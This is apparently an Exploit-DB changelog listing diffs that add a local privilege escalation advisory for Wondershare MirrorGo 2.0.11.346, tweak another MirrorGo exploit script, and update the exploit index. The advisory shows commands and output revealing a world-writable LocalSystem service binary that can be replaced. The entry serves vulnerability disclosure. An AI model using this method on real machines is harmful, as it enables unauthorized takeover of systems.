DB: 2022-02-25

2 changes to exploits/shellcodes

Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions

exploits/windows/local/50130.py

@@ -21,7 +21,7 @@ characters = {
 'E1D0':'f','3CD9':'g','956B':'h','C875':'i','696C':'j',
 '906B':'k','3F7E':'l','4D7B':'m','EB60':'n','8998':'o',
 '7196':'p','B657':'q','CA79':'r','9083':'s','E03B':'t',
-'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z'}
+'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z','!':'B398'}
 
 # ASCII art is important xD
 banner = '''

exploits/windows/local/50787.txt

@@ -0,0 +1,47 @@
+# Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions
+# Discovery by: Luis Martinez
+# Discovery Date: 2022-02-23
+# Vendor Homepage: https://www.wondershare.com/
+# Software Link : https://download.wondershare.com/mirror_go_full8050.exe
+# Tested Version: 2.0.11.346
+# Vulnerability Type: Local Privilege Escalation
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Privilege Escalation:
+
+# Insecure folders permissions issue:
+
+C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe"
+
+
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F)
+
+# Service info:
+
+C:\>sc qc ElevationService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ElevationService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Wondershare Driver Install Service help
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A vulnerability was found in Wondershare MirrorGo 2.0.11.346. The Wondershare MirrorGo executable
+"ElevationService.exe" has incorrect permissions, allowing a local unprivileged user to replace it
+with a malicious file that will be executed with "LocalSystem" privileges.

files_exploits.csv

@@ -11453,6 +11453,7 @@ id,file,description,date,author,type,platform,port
 50765,exploits/windows/local/50765.txt,"HMA VPN 5.3 - Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
 50773,exploits/hardware/local/50773.sh,"Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation",1970-01-01,ibby,local,hardware,
 50776,exploits/windows/local/50776.txt,"Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path",1970-01-01,"Johto Robbie",local,windows,
+50787,exploits/windows/local/50787.txt,"Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions",1970-01-01,"Luis Martínez",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139